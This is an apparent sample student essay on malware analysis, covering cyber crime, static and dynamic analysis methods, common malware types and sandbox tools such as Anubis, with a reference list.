Malware Analysis Research Papers Example

Over the years, the world has seen a great revolution in terms of technology. Various innovations such as the introduction of computers have been accompanied by vices like cyber crimes. In the recent years, questions have been raised about the ability of a clique of individuals to hack into online accounts of organizations and institutions and cause distortion or loss of information. The introduction of courses in educational institutions is also one of the major factors behind the increase in cyber crimes. In the real world, there are internet services and other digital equipments which have escalated the criminal incidences in the cyber space. Notably, some of the digital crimes committed by individuals include Internet fraud, of which the most common are credit card and advance fee fraud, illegal online gambling and the set up of fraudulent websites. Cyber criminals have also taken part in network intrusion and hacking. They have also been behind the spreading of viral infections across various networks, cyber piracy and terrorism, the intrusion of networks and the distribution of child pornography across networks (Taylor, 2011). Cyber crime is one of the challenges that law-enforcement agencies globally face. This is because the collection of evidence for cyber crimes is very hard. Besides, investigation of cyberspace crimes and the connection of the crimes together are near to impossible. Apparently, although there are several tools that promote cyber crime, one of the tools of choice for cyber criminals is malware. The term ‘malware' stands for any malicious software that cyber criminals capitalize on to facilitate the disruption of computer operations. Moreover, criminals may use malware to gather sensitive information and to have easy access to private computer systems. The use of malware is malicious and does not abide by the stipulated regulations of computer users. Every organization strives to eradicate malware infections, as they are a big threat to computer systems.

Malware Analysis Procedures

Notably, malware analysis that has been adopted by several organizations and companies currently refers to the careful study and examination of a malware. The study of malware involves the dissection of its different components and studying how it behaves on the host of the operating system of a computer. In organizations, if malware is detected on computer systems, computer experts, such as software engineers are called upon. Their role is to ensure that the detected malware is eliminated completely from computer systems. There are two ways of maintaining malware for analysis. One of the ways used by software engineers is the static analysis, and this involves the analysis of malware without executing it. The static analysis uses techniques that are applicable on different representations of a computer program. For example, the availability of a source code will enable the static analysis tools to trace memory corruption flaws, and this will help prove the correctness of models for a given computer system. The other representation on which the static analysis techniques are applicable is the binary representation of a program. It is worth noting that when the software engineer eliminating the malware compiles the source code of a program into a binary executable, there is a possibility that some information may be lost (Kendall & McMillan, 2007). This is disadvantageous to the malware analysis process as the loss of information may result in a complication of the task of analyzing the code. Another representation on which the static analysis techniques are applicable is the extraction of useful information of a program. This is aided by the fact that call graphs give the analyst an overview of what and where the functions may be invoked in a given code. However, the use of static analysis for the maintenance of malware for analysis faces various challenges. To start with, it should be noted that the source code of malicious software samples is not readily available, and his reduces the applicability of the static analysis techniques. Besides, the analysis of binaries is often accompanied by intricate challenges. For example, there is the disassembly of programs during the analysis of binaries, and this leads to an ambiguity of results especially in situations when the binary applies self-modifying code techniques. The other challenge that faces the use of static analysis is that there are malware that cannot be determined statistically (Kendall & McMillan, 2007).
Software engineers in organizations can also use dynamic malware analysis techniques to maintain malware for analysis. This involves the analysis of the actions performed by a program while it is being executed. There are four ways through which the dynamic analysis techniques help in the analysis of malware: function call monitoring, function parameter analysis, information flow tracking, and instruction trace. Function is a code's performance of a specific task, and the use of function enables easy maintenance and analysis of software. As a way of analyzing software, function calls are monitored and hooked and this helpful in recording the invocation of a software to a log file or in analyzing the input parameters of a software. Subsequently, function parameter analysis helps in malware analysis as it tries to infer the set of possible parameter values in a static manner. The information flow tracking involves the propagation of data, deemed interesting; throughout the system while a program that manipulates the data is executed. Through this, malware analysis takes place. On the other hand, instruction trace involves the sequence of instructions that a malware executes during its analysis. The instruction trace contains important information that is vital for malware analysis (Kendall & McMillan, 2007).

Malware analysis environment and tools

Before determining the malware analysis environment and tools, it is important to examine the various types of mobile malware infections. To begin with, a worm is a common a malware infection that is prevalent in networked environments and it can be defined as a program with the ability to run independently and at the same time propagate a full working version of itself to other systems or machines. Worms can cause significant interference of computer systems. The other mobile malware infection is the virus. Experts define virus as a code that adds itself to the programs of other computer systems. In contrast to the worm, the virus does not run independently but it requires the activation of the host program for it to function. The virus in computer systems also propagates themselves to infect any host they come across. The other malware infection is the Trojan horse, that though pretends to be useful in computer systems, performs actions deemed to be malicious in the background of computer systems. The other malicious software commonly used by criminals is known as spyware, and its function is to retrieve information from the system of a victim and transfers the information to the attacker. Spyware has been used to hack account information such as bank accounts. Other minor malicious software infections include Bot and Rootkit. During malware analysis, there are environments affected by the malware infections that are always the center of focus. Malware infections easily affect environments such as hardware making them be examined during malware analysis (Van Randwyk et al., 2008). The other environment affected by malware infections is the external applications. A perfect example of a software application is known as debugger. The infection of debuggers by malware also makes it the center of focus during malware analysis. It should be noted that effective malware analysis requires specific tools. One of the key tools in the process is the analysis of an unknown binaries project (Anubis). Anubis analyzes malware by monitoring the invocation of the functions of Windows API (Egele et al., 2012). It also monitors the system service calls to the Windows Native API. The other vital tool in malware analysis is the multiple path exploration, which explores multiple execution paths for Windows binaries thus preventing a malware sample from postponing its malicious activities for a later date (Egele et al., 2012). The Norman Sandbox is the other tool that executes a malware sample in a tightly-controlled virtual environment that simulates a Windows Operating system (Egele et al., 2012).

Knowledge

The knowledge of a malware analyst is the most important factor in thorough and accurate malware analysis. Essentially, a malware analyst should have strong skills in programming. Besides, he or she should be detail oriented (Skoudis & Zeltser, 2004). There is a misconception that a malware analyst should be an elite hacker, and this is not the case.

References

Egele, M., Scholte, T., Kirda, E., & Kruegel, C. (2012). A survey on automated dynamic malware-analysis techniques and tools. ACM Computing Surveys (CSUR), 44(2), 6.
Kendall, K., & McMillan, C. (2007). Practical malware analysis. In Black Hat Conference, USA.
Skoudis, E., & Zeltser, L. (2004). Malware: Fighting malicious code. Upper Saddle River, NJ: Prentice Hall PTR.
Taylor, R. W. (2011). Digital crime and digital terrorism. Boston: Prentice Hall.
Van Randwyk, J., Chiang, K., Lloyd, L., & Vanderveen, K. (2008, October). Farm: An automated malware analysis environment. In Security Technology, 2008. ICCST 2008. 42nd Annual IEEE International Carnahan Conference on (pp. 321-325). IEEE.